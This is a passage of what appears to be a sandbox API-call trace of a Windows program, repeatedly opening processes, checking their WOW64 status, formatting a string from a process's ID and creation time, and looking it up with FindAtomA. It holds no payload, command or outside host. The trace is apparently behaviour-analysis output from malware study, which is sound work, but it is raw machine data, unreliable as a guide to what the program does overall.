	[0077.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.166] CloseHandle (hObject=0x224) returned 1
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.166] CloseHandle (hObject=0x224) returned 1
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.166] CloseHandle (hObject=0x224) returned 1
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.166] CloseHandle (hObject=0x224) returned 1
	[0077.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.167] CloseHandle (hObject=0x224) returned 1
	[0077.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.167] CloseHandle (hObject=0x224) returned 1
	[0077.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.167] CloseHandle (hObject=0x224) returned 1
	[0077.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.167] CloseHandle (hObject=0x224) returned 1
	[0077.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.167] CloseHandle (hObject=0x224) returned 1
	[0077.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.167] CloseHandle (hObject=0x224) returned 1
	[0077.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.168] CloseHandle (hObject=0x224) returned 1
	[0077.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.168] CloseHandle (hObject=0x224) returned 1
	[0077.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.168] CloseHandle (hObject=0x224) returned 1
	[0077.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.168] CloseHandle (hObject=0x224) returned 1
	[0077.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.168] CloseHandle (hObject=0x224) returned 1
	[0077.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.168] CloseHandle (hObject=0x224) returned 1
	[0077.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.169] CloseHandle (hObject=0x224) returned 1
	[0077.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.169] CloseHandle (hObject=0x224) returned 1
	[0077.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.169] CloseHandle (hObject=0x224) returned 1
	[0077.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.169] CloseHandle (hObject=0x224) returned 1
	[0077.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.169] CloseHandle (hObject=0x224) returned 1
	[0077.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.170] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.170] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.170] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.170] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.170] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.170] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.170] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.171] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.171] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.171] CloseHandle (hObject=0x224) returned 1
	[0077.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.171] CloseHandle (hObject=0x224) returned 1
	[0077.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.171] CloseHandle (hObject=0x224) returned 1
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.262] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.262] CloseHandle (hObject=0x224) returned 1
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.262] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.262] CloseHandle (hObject=0x224) returned 1
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.262] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.262] CloseHandle (hObject=0x224) returned 1
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.262] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.262] CloseHandle (hObject=0x224) returned 1
	[0077.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.262] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.263] CloseHandle (hObject=0x224) returned 1
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.263] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.263] CloseHandle (hObject=0x224) returned 1
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.263] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.263] CloseHandle (hObject=0x224) returned 1
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.263] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.263] CloseHandle (hObject=0x224) returned 1
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.263] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.263] CloseHandle (hObject=0x224) returned 1
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.263] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.263] CloseHandle (hObject=0x224) returned 1
	[0077.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.263] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.264] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.264] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.264] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.264] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.264] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.264] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.264] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.265] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.265] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.265] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.265] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.265] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.265] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.265] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.265] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.265] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.265] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.265] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.265] CloseHandle (hObject=0x224) returned 1
	[0077.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.266] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.266] CloseHandle (hObject=0x224) returned 1
	[0077.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.267] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.267] CloseHandle (hObject=0x224) returned 1
	[0077.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.267] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.267] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.267] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.267] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.267] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.267] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.268] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.268] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.268] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.268] CloseHandle (hObject=0x224) returned 1
	[0077.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.268] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.268] CloseHandle (hObject=0x224) returned 1
	[0077.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.268] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.268] CloseHandle (hObject=0x224) returned 1
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.338] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.338] CloseHandle (hObject=0x224) returned 1
	[0077.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.339] CloseHandle (hObject=0x224) returned 1
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.339] CloseHandle (hObject=0x224) returned 1
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.339] CloseHandle (hObject=0x224) returned 1
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.339] CloseHandle (hObject=0x224) returned 1
	[0077.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.339] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.339] CloseHandle (hObject=0x224) returned 1
	[0077.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.340] CloseHandle (hObject=0x224) returned 1
	[0077.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.340] CloseHandle (hObject=0x224) returned 1
	[0077.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.340] CloseHandle (hObject=0x224) returned 1
	[0077.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.340] CloseHandle (hObject=0x224) returned 1
	[0077.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.340] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.340] CloseHandle (hObject=0x224) returned 1
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.341] CloseHandle (hObject=0x224) returned 1
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.341] CloseHandle (hObject=0x224) returned 1
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.341] CloseHandle (hObject=0x224) returned 1
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.341] CloseHandle (hObject=0x224) returned 1
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.341] CloseHandle (hObject=0x224) returned 1
	[0077.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.341] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.341] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.342] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
